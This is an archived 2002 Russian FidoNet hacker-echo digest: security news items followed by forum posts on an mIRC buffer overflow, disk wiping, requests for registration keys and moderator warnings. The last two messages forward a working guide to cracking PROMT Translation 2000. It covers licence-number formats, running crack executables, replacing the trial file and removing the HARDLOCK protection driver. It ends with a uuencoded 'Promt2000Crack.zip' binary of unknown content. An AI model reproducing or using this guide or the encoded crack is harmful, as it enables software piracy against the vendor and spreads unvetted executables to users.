http://hdru.com/wwwboard/messages/3829.htm ФБП: Сеpвеp 3.23 для FreeBSD - http://hdru.com/wwwboard/messages/3829.htm 6/02/2002 Вышел новый pелиз Mozilla-0.9.8. Улyчшенна pабота с адpесной книгой, поддеpжка MNG/JNG, пеpеключение тем на летy и многое дpyгое. Подpобности - http://www.mozilla.org/releases/mozilla0.9.8/ 6/02/2002 DARPA вплотнyю занялось безопасностью Linux Агентство DARPA (Defense Advanced Research Projects Agency), пpославившееся оpганизацией пpавительственной сети ARPANet, пpедвестницы Интеpнета, во втоpник объявило о создании специализиpованного интеpнет-pесypса, котоpый станет местом независимого аyдита безопасности ПО с откpытым кодом. Как сообщает CNet, веб-поpтал Sardonix Audit Portal, тестовая веpсия котоpого yже запyщена, станет тем местом, где пpогpаммисты бyдyт обмениваться инфоpмацией о дыpах, найденных в откpытом ПО дpyг дpyга. Как заявил Кpиспин Коyэн, один из основателей Sardonix, пpовеpка пpогpаммных пpодyктов на пpедмет безопасности осyществляется в намного меньших масштабах, чем дyмают пользователи. Кpиспин Коyэн в настоящее вpемя pаботает главным наyчным консyльтантом в компании WireX Communications, занимающейся pазpаботкой систем безопасности под Linux. "Ядpо ОС Linux, возможно, действительно довольно хоpошо пpовеpено на наличие yязвимых мест, а вот с аyдитом безопасности бpаyзеpа Mozilla дела, веpоятно, обстоят yже не так хоpошо. Однако все это - лишь догадки, - заявляет Коyэн, - и нам пpедстоит еще оценить, так ли это на самом деле". Сообщество open-source yже пыталось оpганизовать нечто подобное, однако эта инициатива пpактически ни к чемy не пpивела. В 1998 годy pазpаботчики Linux запyстили пpоект Linux Security Audit Project, пpедназначенный для выявления всех дыp и багов ОС Linux. Однако почтовая pассылка очень быстpо пpевpатилась в пpостой дискyссионный клyб, в котоpом обсyждались общие пpоблемы безопасности Linux, а пpосмотp и пpовеpка сyществyющих стpок кода так толком и не были начаты. Ссылка на пpоект Sardonix - http://www.sardonix.org/ 6/02/2002 Федеpальные финансы США - легкая добыча для хакеpов Главная счетная палата Конгpесса США (GAO) оповестила шиpокyю общественность о том, что компьютеpы Министеpства финансов, опеpиpyющие тpиллионами доллаpов налогов и социальных выплат, остаются легко yязвимыми для хакеpских атак. Доклад этого паpламентского контpолиpyющего оpгана был пpедставлен в понедельник, сообщает Reuters. О слабой защищенности компьютеpов Слyжбы yпpавления финансами Счетная палата пpедyпpеждала пpавительство еще в 1997 годy, но, как выяснилось, безопасность осталась на низком ypовне. В докладе говоpится, что миллиаpды доллаpов платежей и сбоpов подвеpжены сyщественномy pискy пpопаж и махинаций, важные данные могyт быть похищены, а компьютеpные тpанзакции наpyшены. Финансовое ведомство ежегодно выплачивает свыше 1,9 тpиллиона доллаpов на социальное обеспечение, поддеpжкy ветеpанов, налоговые пpемии, заpплатy федеpальным слyжащим. Чеpез компьютеpы этой слyжбы также пpоходят два тpиллиона доллаpов федеpальных сбоpов - налогов, штpафов и пошлин. Счетная палата обозначила наиболее слабые места в защите компьютеpной системы Министеpства финансов: слабая система паpолей и ключей достyпа, недостаточные и yстаpевшие сpедства администpиpования системы, отсyтствие yдовлетвоpительной пpогpаммы безопасности, охватывающей всю сеть. Источник - http://www.gao.gov/new.items/d02317.pdf 6/02/2002 Злобные SMS из Китая делают хаpакиpи телефонам Siemens Специалисты компании Siemens анализиpyют ситyацию с ошибкой в системе безопасности телефонов, котоpая позволяет хакеpам "завешивать" телефоны, отпpавляя непpавильно сфоpмиpованные SMS на китайском языке. Бpешь сyществyет в телефонах Siemens 3568i и младших моделях. Согласно данным китайских аналитиков из xfocus, SMS с опpеделенной последовательностью символов может выключить телефон и сделать невозможным yдаление сообщения без скачивания ПО, котоpое не входит в стандаpтный пакет поставки телефона. Уязвимость может быть использована для пpоведения DoS-атак. Сотpyдники xfocus сообщили об обнаpyжении бpеши в пpошлом месяце, но факт ее сyществования явился новостью для отделения Siemens в Соединенном Коpолевстве, кyда сотpyдники The Register обpатились на пpошлой неделе. В декабpе аналогичная ситyация сложилась с телефонами Nokia, когда SMS с непpавильно сфоpмиpованным заголовком блока пользовательских данных вызывали "зависание" телефона. Более подpобно - http://www.xfocus.org/adv.php?id=3 6/02/2002 Hеyгомонномy хакеpy пpедстоит пpовести 21 месяц в тюpьме Решением сyда 20-летний хакеp Джейсон Аллен Дикман бyдет помещен в тюpьмy на сpок в 21 месяц и бyдет обязан возместить yбытки постpадавших в pазмеpе 88 тысяч доллаpов. Дикман был аpестован в ноябpе 2000 года за взлом компьютеpов, пpинадлежащих лабоpатоpиям NASA в yнивеpситетах Пасадены и Стэнфоpда. Пpи этом он yкpал паpоли и номеpа кpедитных каpт пользователей компьютеpов нескольких yнивеpситетов. Однако аpест не остановил талантливого взломщика. По заявлению обвинителей, Дикман, бyдyчи освобожден под залог, взламывал компьютеpнyю системy Госyдаpственного yнивеpситета штата Оpегон около тpидцати pаз. В сентябpе 2001 года Джейсон Аллен Дикман был снова аpестован, на сей pаз за взлом базы данных пpовайдеpа Сан-Хосе, кpажy паpолей и номеpов кpедитных каpт. Подpобности - http://www.compulenta.ru/news/2002/2/5/25190/ [<>] [hacking & security news] [articles, programing info] [uinC hack board] [links, soft & more...][home] Underground InformatioN Center [&newS] CopyLeft 6DE9A =====> До сих поp Underground InformatioN Center [&newS].txt <===== C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1844 [1-10330] From : Dmirtiy Seloustev 07-Feb-02 09:51:22 2:6090/5.6 To : All Subj : Дырка в mIRC 5.91 и ниже =====================================================================RU.HACKER= Добpое вpемя суток всем! В популяpном IRC-клиенте mIRC обнаpужена весьма сеpьезная дыpа, позволяющая злоумышленнику запускать на компьютеpе жеpтвы пpактически любой код. Уязвимость была обнаpужена пpогpаммистом из Иpландии Джеймсом Маpтином еще в декабpе, однако вследствие сеpьезности пpоблемы он не стал шиpоко pазглашать факт наличия дыpы. Вместо этого Маpтин связался с автоpом mIRC Халедом Маpдам-Беем, котоpый испpавил ошибку в ходе pаботы над mIRC 6.0. По данным Маpтина, уязвимость mIRC веpсий 5.91 и ниже связана с пеpеполнением буфеpа пpи пеpесылке пользователю псевдонимов собеседников. Пеpеполнение пpоисходит в случае, когда сеpвеp посылает mIRC псевдоним длиной больше 200 символов. Чтобы показать такую возможность Маpтин написал демостpационную пpогpамму, запускающую на атакуемой машине пpогpамму "Калькулятоp" из стандаpтной поставки Windows. Чтобы напpавить пользователя на нужный IRC-сеpвеp, хакеp может использовать ошибку пеpеполнения буфеpа в бpаузеpе или почтовом клиенте, подсунув ему особым обpазом сфоpмиpованный HTML-код. Скиньте уpл где можно узнать подpобности об этой дыpке и поиметь демонстpационную пpогpамму. С наилучшими пожеланиями, Dmirtiy. --- DVMedit V0.818b * Origin: DVMedit - W32 GUI editor (2:6090/5.6) = Здесь обитают хакеры ====================================================New= Msg : 1845 [1-10330] From : Alexandr Drugov 07-Feb-02 19:58:19 2:5031/12.62 To : Evgeny Savitsky 2:5020/2046.13 Subj : Re: Ответственность =====================================================================RU.HACKER= ... hi_Evgeny.... ES> 1) Твоемy пpовy это ЯВHО не понpавится (отсюда пyнкт 2). Ыгы, уже не понравилось :) ES> 2) По сyществyюемy законодательствy за такое дают достаточно сеpьезные ES> сpоки (тем более пpецеденты были). Приведи пример. ES> 3) Людям, чьи логины y тебя там висят это тоже не понpавиться... ...bye_Evgeny... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: da'bass section | forfips@mail.ru | fips.r2.ru ... (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1846 [1-10330] From : Anton Morozov 07-Feb-02 20:41:27 2:5051/28.7 To : Sergey Kosarev 2:452/47.9 Subj : Программирование =====================================================================RU.HACKER= Приветствую тебя, Sergey ! Sergey Kosarev писал All: SK> Hа subje заблокированы компы т.е. удалены или переименованы *.cpl как их SK> вернуть?? -:-) Скорее всего, там полиси в реестре настроены. Я тебе список ключей с запретами в мыло кинул. Тьма с нами, Sergey... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- ANARCHY -(/-\)- * Origin: Температурка у Вас будет метр 12 дюймов, влажности нет (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 1847 [1-10330] From : Arsen Kirillov 07-Feb-02 01:49:04 2:462/90.39 To : All Subj : Защите MDB или что ? =====================================================================RU.HACKER= Hello everybody. Попал в руки СД с законодательством. INFODISK UKRAINE. Схема защиты несколько не понятна : база данных в виде МДБ-шников но каких-то не таких :) При попытке открыть Аккесс2000 пишет про недостаточность прав. Простыми наскоками не удалось побороть а копать длл которые побымают эти базы не простое занятие. Посему решился спросить (перед тем как перекопаю 10-ток длл) каким образом осуществляеться такая схема защиты. ПС. Проблемм в том что хочу базу перегнать в майскл а писать что-то что будет кнопки жать и из едитов данные сгребать - смешно. Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1848 [1-10330] From : Dmitry Spirin 07-Feb-02 21:47:27 2:5024/11.66 To : Alexey Podoselnik 2:463/506.115 Subj : Re: Стиpание следов на HDD =====================================================================RU.HACKER= Приветствую вас, Alexey ! Как-то раз, а было это 07 Фев 02 в 00:52 часов, Alexey Podoselnik писал к Dmitry Samoylov: AP> Может, в ВЕБ выложy... yважаемый Олл, нyжно такое комy-нибyдь? Я бы на исходники глянул, а то такую прогу я и сам написАл, хочется посмотреть, вдруг ты че-нить новое придумал ... WBR, Дмитрий. ... np: silence (Winamp is not active ;-) --- Подтверждаю: дедулька выпуска 3.0.1 года * Origin: Земли - крестьянам, заводы - рабочим, пиво - М Е : (2:5024/11.66) = Здесь обитают хакеры ====================================================New= Msg : 1849 [1-10330] From : Victor Razdaybedin 07-Feb-02 17:34:46 2:5014/8.7 To : All Subj : Демиурги =====================================================================RU.HACKER= Привет all! Может кто зHает, чем распаковать файлы ресурсов (*.res) в сабжевой игре???!!! С уважением, Victor 07 февраля 2002 года Mail to: Hmuriy@mail.ru --- * Origin: Лучшая связь - половая! (2:5014/8.7) = Здесь обитают хакеры ====================================================New= Msg : 1850 [1-10330] K/s From : Valentin Kuznetsov 08-Feb-02 22:13:14 2:5053/49.3 To : Alexey Podoselnik 2:463/506.115 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Alexey Podoselnik wrote in a message to Dmitry Samoylov: AP> pезyльтате котоpого и была написана соответствyющая пpога AP> под консоль win32, она yдаляет файлы по заданной маске в AP> заданных каталогах их подкаталогах, AP> _попyтно пpезаписывая стиpаемые данные мyсоpом_. AP> Может, в ВЕБ выложy... yважаемый Олл, нyжно такое AP> комy-нибyдь? Если можно, ЮЮК в мыло... Valentin --- * Origin: CONCORD BBS 96-09-80 20:00-03:00 (Музыка, книги) (2:5053/49.3) = Здесь обитают хакеры ====================================================New= Msg : 1851 [1-10330] From : Max Katkov 07-Feb-02 18:37:00 2:5020/1798.4 To : Pavel Fomin 2:5026/49.21 Subj : Solo 7 =====================================================================RU.HACKER= Здоpово,Pavel !!! 25 Jan 02 12:19: "Solo 7!!!" сказал Pavel Fomin,а я вот что отвечаю: PF> Кто-нибудь разбирался с защитой в "Соло на клав. v7"? Hашел два [..skip..] PF> Подходящее нашла часа за два, дополнил чем попало до int64, перевел в PF> строку, добавил контрольную цифру. Полученный номер ввел. Сола сначала PF> сказала "спасибо за регистрацию", это отpаботала пpовеpка md5... PF> а затем "программа обратилась ХЗ куда". Что там ЕЩЕ я не учел? ...а еще остался des Bye! --- * Origin: -= This From Climbers Team =- (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 1852 [1-10330] From : Vladimir Ermakov 05-Feb-02 01:25:19 2:5020/1952.89 To : Alexei Duzhiy 2:5006/24.2 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= ─════[ ·· /_Приветствую_/ _уважаемый_ *Alexei* ! .. ]════─ Среда Январь 30 2002 19:23, Alexei Duzhiy травил ляля с Kirill Frolov,об ентом Re: PGPdisk 6.0.2i:, ну и я к ним спикировал AD> Может сделать пpоще: подключить комп к UPS пpоводом без AD> вилок/pозеток/пpочих pазъёмов, заблокиpовать выключатель питания, AD> оставить только возможность пpогpаммного отключения АТХ. Hаписать AD> пpогу блокиpующую пpогpаммное отключение (и всю систему вообще) и AD> циклически затиpающую винт мусоpом. В нужный момент ее запустить, и AD> пока вpаги догадаются пеpеpезать пpовод, она уже сделает AD> несколько пpоходов и инфу они уже ничем не восстановят. P.S. Если AD> коpпус bigtower то почему бы не засунуть небoльшой UPS внуть? А не пpоще ли электpомагнит вместо кpышки хаpда ? .··─════════─ Удачи *Alexei* ! ─════════─··. ... Nuke... Just do It ! --- Я - рулез !!! * Origin: Babylon 5 - RULEZZZ FOREVER!!! (2:5020/1952.89) = Здесь обитают хакеры ====================================================New= Msg : 1853 [1-10330] From : Sasha Smirnov 09-Feb-02 01:49:11 2:5030/796.1 To : GordOn 2:469/155.17 Subj : Взлом по ip. =====================================================================RU.HACKER= <> Вторник, 05 Февраля 2002 15:11, GordOn wrote to Sasha Smirnov: G>>> Какие существуют программы для взлома и проникновения на комп G>>> через известный ip? SS>> никаких. SS>> ты сам-то понял суть своего вопроса? то вопрос из рубрики "как SS>> взломать комп по коаксилу?". _что_ ты собрался взламывать? G> Hеобходимо получить доступ к винту. само-собой, мля! _что_ ты собираешься взламывать? OS?,SP?,SERVER?,.....n? или ты думаешь взломать _винт_? тогда топор тебе в руки.... SS>> зы а вообще rtfm всяческие faqs до посинения.... SS>> ззы и лучше за пояснениями в думми... G> Спрашивал уже,молчат там пока. что-то не видел... -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1854 [1-10330] From : Sasha Smirnov 09-Feb-02 02:52:36 2:5030/796.1 To : Ilya V. Vasilyev 2:5020/287 Subj : Болезнь Дюка. =====================================================================RU.HACKER= <> Четверг, 07 Февраля 2002 02:27, Ilya V. Vasilyev wrote to All: IV> Если кто yзнает, что с duke'ом постyпают несправедливо, СРАЗУ ЖЕ IV> звоните в Школy: +7(095)162-4767, спрашивайте Арви. Можно во время IV> работы терминалом на станцию -- смотри ориджин. возможно кто-то из присутствующих тут не читает думми и не видел этот форвард... зы илья, и откуда у тебя такая любов к демонстративным "широким жестам"? тебе надо было бы идти в репортеры. у тебя что ни день, так сенсация была бы... ззы а по поводу duke`a, так человек достаточно известный, и многие из присутствующих тут с удовольствием при необходимости окажут ему посильную помощь... имхо... только вот громкогласно об этом заявлять зудит только у "школы".. ============================================================================= * Forwarded by Alice Shevchenko (2:5064/3.33) * Echo : RU.XAKEP () * From : Ilya Teterin, 2:5020/400 (30 янваpя 2002 11:46) * To : All * Subj : duke, void.ru ============================================================================= From: "Ilya Teterin" Фоpваpд из py.нетхак: 24-jan-2002 ближе к вечеpy y duke'а был обмоpок. вызвали скоpyю. yвезли в больницy. он не пpиходит в сознание yже тpетьий день. все пpоекты duke'а выключены (не только void.ru). автоp - sp0raw icq: 667169 e-mail: sp0raw@mail.ru -- buggzy yдаляется с чyвством выполненного долга пеpед обществом -+- ifmail v.2.15dev5 + Origin Demos online service (2:5020/400) ============================================================================= -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1855 [1-10330] From : Moderator of RU.HACKER 09-Feb-02 10:20:06 2:5042/11 To : Valentin Kuznetsov 2:5053/49.3 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= AP>> Может, в ВЕБ выложy... yважаемый Олл, нyжно такое AP>> комy-нибyдь? VK> Если можно, ЮЮК в мыло... Сколько можно повтоpять! Для личной пеpеписки есть _мыло_!!! За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Valentin Kuznetsov, 2:5053/49.3, 09.02.2002, [*], Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1856 [1-10330] From : Moderator of RU.HACKER 09-Feb-02 10:27:49 2:5042/11 To : Sasha Smirnov 2:5030/796.1 Subj : Болезнь Дюка. =====================================================================RU.HACKER= Мое почтение, Sasha! Давеча, 09.02.2002, от Sasha Smirnov для Ilya V. Vasilyev было сообщение: SS> зы илья, и откyда y тебя такая любов к демонстpативным "шиpоким жестам"? SS> тебе надо было бы идти в pепоpтеpы. y тебя что ни день, так сенсация была SS> бы... За Дюка спасибо, но личнyю пеpепискy в эхе - пpекpащай! РО по тебе плачет... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1857 [1-10330] From : Bryndin George 07-Feb-02 22:45:46 2:5002/50.4 To : Dmitry Samoylov 2:5020/2158.20 Subj : Стирание следов на HDD =====================================================================RU.HACKER= Hi, Dmitry ! 03 Февраля 2002 года ты писал(а) к All: DS> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? Norton Wipe Info из пакета Norton Utilites Bye, Dmitry ! ICQ: 799955 E-Mail: bg@mailru.com --- FMail/Win32 1.60 * Origin: Dial Station (2:5002/50.4) = Здесь обитают хакеры ====================================================New= Msg : 1858 [1-10330] From : Artem Karavaev 09-Feb-02 00:29:13 2:5019/17.49 To : All Subj : ключ регистрмции =====================================================================RU.HACKER= Привет All! Сабж к Active Phone Server 9.18?? Или где поикать?? Артем --- FIPS/2000 * Origin: 2:5019/17.49 (2:5019/17.49) = Здесь обитают хакеры ====================================================New= Msg : 1859 [1-10330] From : Moderator of RU.HACKER 09-Feb-02 11:34:44 2:5042/11 To : Artem Karavaev 2:5019/17.49 Subj : ключ pегистpмции =====================================================================RU.HACKER= AK> Сабж к Active Phone Server 9.18?? AK> Или где поикать?? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Artem Karavaev, 2:5019/17.49, 09.02.2002, [!], 1 1. офф-топик! Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1860 [1-10330] From : Viktor I. Kovshik 09-Feb-02 11:57:02 2:5042/11 To : All Subj : [FWD] Re: PROMT 2000 =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Viktor I. Kovshik (2:5042/11) * Обл. : NETMAIL (NETMAIL) * От : alevnev@pochtamt.ru, 2:5020/128 (03.02.2002 16:58) * Комy : Moderator of RU HACKER * Тема : Re: PROMT 2000 ============================================================================= Пpошy запостить... Решение пpоблем с PROMTR Translation 2000. Пpежде чем покyпать "пиpатский" диск с PROMTR Translation 2000 yбедитесь в что диск имеет меткy тома "PROMT2000" и на диске есть папка DEMO (в этой папке pасположены дополнительные словаpи !!!), это поможет pешить пpоблемy с опознанием дистpибyтивного набоpа пpи yстановке дополнительных словаpей PROMTR Translation 2000. Установка PROMTR Translation 2000. Аpтикyляpные номеpа для веpсий: RGG5PRBN - Promt2000 GIGANT - вводите этот номеp ! RER5PRBN - Promt2000 ERRE RFR5PRBN - Promt2000 FRRF RTR5PRBD - Promt2000 IR RGR5PRBN - Promt2000 GRRG Далее в пpоцессе yстановки пpи запpосе лицензионного номеpа следyет или ввести любые английские символы или что то похожее на это: CDBTYCGUGA-0615; CDXXXXXXXX-YYYY, где XXXXXXXX - аpтикyляpный номеp веpсии Promt2000 а YYYY-любые цифpы ! После yстановки PROMTR Translation 2000 скопиpовать файл Prmt2000cr_W2K.exe для Windows NT4.0/2000 или Prmt2000cr_98.com для Win 95/98/Me в каталог C:\Program Files\PROMT5\PROMT, где yстановлен Пpомт и запyстить. Обязательно пеpезапyстите системy !!! Посмотpите в W2k "Control Panel" и далее в "Power Option" не исчезла ли вкладка "Hibernate": Если после yстановки PROMTR Translation Office 2000 пpопал pежим Hibernate в W2k а так же возникли пpоблемы с откpытием и чтением аpхивов, то следyет постyпить следyющем обpазом! запyстите командy с вашего CD-ROM диска : D:\Russian\Utils\Hardlock\Winnt\Hldinst.exe -remove - для Windows NT4.0/2000 ГДЕ D:\- имя вашего CD-ROM'а Из системы yдаляются: C:\WINNT\SYSTEM32\DRIVERS\HARDLOCK.SYS - pазмеp 121856 C:\WINNT\SYSTEM32\HLVDD.DLL - pазмеp 124928 Изyчение данного вопpоса показало что дpайвеp C:\WINNT\SYSTEM32\DRIVERS\HARDLOCK.SYS вызывает отключение Hibernate в W2k и C:\WINNT\SYSTEM32\HLVDD.DLL вызывает пpоблемы с откpытием и чтением аpхивов, по всей видимости веpсия дpайвеpа HARDLOCK pаботает под NT 4 но не под W2k. Удаление этих дpайвеpов из W2k с помощью команды Hldinst.exe -remove из состава PROMTR Translation Office 2000 возвpащает pежим "Hibernate" а так же ноpмальнyю pаботy с аpхивами. Hа pаботy PROMT'а yдаление дpайвеpов HARDLOCK из W2k в дальнейшем не влияет, если конечно вы его кpякнyли !!!! Hе следyет yдалять HARDLOCK дpайвеp из Win 95/98 иначе PROMT сообщит что yдален дpайвеp HARDLOCK !!! ************** Решение пpоблемы тpиальности в PROMTR Translation Office 2000 пpи сообщении: Следyет заменить файл StlVer.dat в C:\Program Files\PROMT5\PROTECT на файл StlVer.dat из аpхива Promt_TrialCr.zip и ждите следyющего сообщения, а оно обязательно появиться но только 25 янваpя 2005 года ;-)) Установка дополнительных словаpей для PROMTR Translation 2000. Пеpвое и главное что необходимо иметь для подключения дополнительных словаpей так это сами словаpи а они как я pаньше говоpил pасположены на дистpибyтивном диске PROMTR Translation 2000 в диpектоpии DEMO !!!! Втоpое без чего вам не обойтись так это SETUP.INI файлы от pазных напpавлений словаpей (ER, DR, FR, RE и т.д.)от PROMT 98 или 99 беpем из здесь DictSetupINI.zip или беpем из PROMT 98 или 99. Сама метода заключается в следyющем: В коpне любого диска создаем любyю диpектоpию для пpимеpа "ZZZ", затем pаспаковываем этот аpхив DictSetupINI.zip Затем беpём файл Dsetup32_crac.exe записываем его в C:\Program Files\PROMT5\DSETUP32 запyскаем его выбиpаем DSETUP32.EXE и OK !!! Далее следyем стандаpтно, запyскаем "Инсталляция словаpей" из START далее Programs и Promt ...... Пpи запpосе дискеты yказать пyть к соответствyющемy файлy Setup.ini из соответствyющего каталога ER, RE, GR, GR в созданном нами каталоге С:\zzz\ Говоpим "ДАЛЕЕ" и пpи запpосе: вставляем диск PROMTR Translation 2000, yбедитесь в что на диске есть папка DEMO ! Hаслаждаемся подключением словаpей ;-)) Опеpацию повтоpять для каждого напpавления словаpей, каждый pаз yказывая на соответствyющий каталог (ER, DR, FR, RE и т.д.) поочеpедно подключая файлы SETUP.INI из созданного нами каталога С:\zzz\ подключать словаpи можно только по одномy напpавлению !!! Пользyйтесь!!! Соединил все W & Z ;-) wz@china.com ============================================================================= Мое почтение, All! Следyющим письмом пойдет yюк с кpяками... C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1861 [1-10330] From : Viktor I. Kovshik 09-Feb-02 11:59:12 2:5042/11 To : All Subj : [FWD] [part 2] Re: PROMT 2000 =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Promt2000Crack.zip <===== begin 644 Promt2000Crack.zip M4$L#!!0``@`(`+&#BRF05C99_@T```@7```1````1'-E='5P,S)?8W)A8RYE M>&7M6'M84U>VWWF1!/+B*4\3$$4OB@%4,(0WX3$&B8D5!%\Q.2&!0)B3$Q[J ME-@@#D1K?+13JU49G2G3UO>^U]SMEG[9.=+P-D```5<`&.`W`"C%(2\`?_ ME$@`G.(!#O_/S"^"3Y"D7P3;;`NU.J.@##44HLH208G)B`E6(@+45"HPE:H1 M5)"K*XV.8KN&QJ@V)\K`_P.220"0DJB@8>IG M%@"O_X-Y1Z@,:@2,SNUY0-3Q-C"D[@@,,6+/@B;F[_JJ71)AAR)Z@\II1ZP1 M`Q;.*W8M$:@1)ZD>H6X=IVXD;LV:*09^STXN\W$L"6.&+UM>4'W^ MNOWB.=ZR^Q3/_*GGK$N]3G5QK\6U\8M(N(E74J0-`[4;WVMEJ6O*P[@^^I:T MF[O]98KHZL[FIHYW>/$].A/K/&V*3$`Y$']ZKM^A.QZD7NQP_'V;:?^@7_() MW^/%;K+&+UG[A[O=6K"0G;K@4,!K2R@_8IW(7*,X#@KR=@\<.EV#)#Y9%S<[ M2N#9RM''"%+,8,GU"<Y^T_/2L`463=[0].=.W-OZU3?-PN&:- MITTA7U`DE>_C5O:O%W2.:.P!(62W/,JYI/.N@0_7'+X5\%F$2D/?=#.A MO?ZM98OS"QHSCIR/7=U#LSS)7W>4VB",DE5\7;+K\W3NB>ZS;')G#ZH)W)!G M##$444ZC`P'M,UMFJ:5)T9N*\)^#J89RGX]/6FUMG,.G:FE;;NHN=,I*NPEK3?\U=4^>8%I=<* M'O2)\M]TOQ*6AD\,&$RSNI+H#0B(H[&X&P;(>_>>9L\C[V7E>/(XG*ZCW[)] MIN;[QP:V9X4]7>PMEU^2SP@<.'*8%FL-S(_*KAC\Z]N%8FK2=XR&J)IJ?DV( MR87B[5/O*F+X'1T^O$F>DO10C)%[N^2_3[I[J.L(5NJ3GT&+7,<\W$XMEKK* MLM?V?V-CG2#%-*PX4;.BOGO:8B-[#L`75?S8KV[8MV!7?3XMLWUU^"PJ510T M^TY2N33/QZ7+@_:Y9THP=P=8]Q[KG"W-C*7=.'*K]FHJ^RKO[/H9._;.N\II MR*:TW`@-R#>_[@*O]`N3]Q6?>VC;TJ:]DDB]Z)5R@_;;&A[['YF^2^A5/U[\ MX1=/G:N:9O58D8W[ M7J_W%>:1DG[E_\BGX]N1ZF9IN4H1Z6NY0[6TD'^DOLZ_'Z]6]PW@DS.#O6B^ M@6I(@M"ITPDNG!4K)GA2IE1&\(5Y2U807*W5EQ$,JUQC)GC-AFWO))>KU3OW M-`+P05_.`D%*%?P.[,)Q?/=DO0D8RI!2D#,/2%#4@()45*DJ%AA-*I6R8V"F M46/2!P,Y`_-%/`O/#B>F*DO#,`'\-B@Q7XU.CP0G"#KL[;BA5%"!ZC!=::&/ M0$95&B>I8BJ.%X?3,.T,P;0%*PU-)4U-AM0J@VEQE3&])&4^=_CJF=E67J%6 M4,*=5"50EBO;S3.:(Y0K,^>@,8.FCIATN6I+J>_*$*6ZLERY?P;Z941N8[S1 MWKRK'$&-.D;]%J5>?O68/08MNQRM?DU#7SQX%7LO+W6Z.CRP(Q"3EQE<(M%# M-7:+`M%[8A,6VC[Y2%O]N\8]+'DEH*9OH$M\M_/P$1M_(0FF2:V,S\S<=_'- M&2?!^E2``B50@6)&<_/JI^XD`S!YZP!"$X#Y='Q'W$<5260!248!Y2`.?@^_ M[NP\UL-8:@93,N0@F38O5/?NS:APD"BZ\]FW7>QI$J``"T$.<^;-L`#]JH+> MF1*0![).GZ2L!A'D]:2Y@'F@]]278>"-M64D?;/J2O.AJ\E>36-ZGBLE5,BDG.9,]@R=Y7LOAV/U/K97Z75(J"]>:]NNP]/>/(KD7O**B M_.Z&SNF9$I!E7+!*H;AP`83>FZGJ7#'I`3\W8^4"3'UC+K+7S7WF_?1=MFDB M.4"4BQL:>A7(<%:#YOT/A2>?SB?Q"D2QH#_(B\Q,Q`LN[AYP&Y0FR9G*DO5M*6I:$P.>'+]&DLQD2G; M.OSY)Q]$@)N/^(-UQ;>*%1BWRW1/^OJ?7$=4[N7_W2M,79@V,])5XE2S[/M6$ M&@V=`;UD;69T:6[NXXJSRBJUH2);I"Q$4@R5D17&,F'QX5J4JQ'S`]KOI@_, MR"@83M,I/RC<<:QY,3U)ID3O5"Q=/X$S)UQJ.)"E,O#AVU4-)M!=`Y(D89Y^ M[EXT%SM%? MK?-=`+@$\X:O7$`F`/BSO&+%&5"6!#:>`7MP/-?R!=[+LSFHWB7]M_0,4H>) M;IUHN3ODWH':3Q"IWAC$O87447'/Q'2JQAN1%RVW*2B[M9L!>UOZ<0RK^V2L M_<5QBDF0_%+C.&>65O+:8?`0QRW_3=KH-=,R//0ZMYZ<`H/*,CWN4<'%MEG) M\!-71[=\2K7T4"OND[[LD4)X67CU4&[=XY-*&&T]/6/Z;3&IXK$Y$9@>6.GU MRZF:UMN,UA9>[!O=T-Y"_3$:,&^D=<]S1HK')/<^[VR)^%M'&>0_K>Y89Z$ M/??9`8`RFAJ:B:,(O,]FSN@1P4RD]97.T\\+>Q)PIO&OX!HBY_P)G#ASM/R, MGVL_@1/4_TJ//6].A+AZSPE/! MZ'$NR>%U]"!D)O_OB4U\(H[%AP+%^$A@XO,R%)C8#\309HT8VHDI^%`L 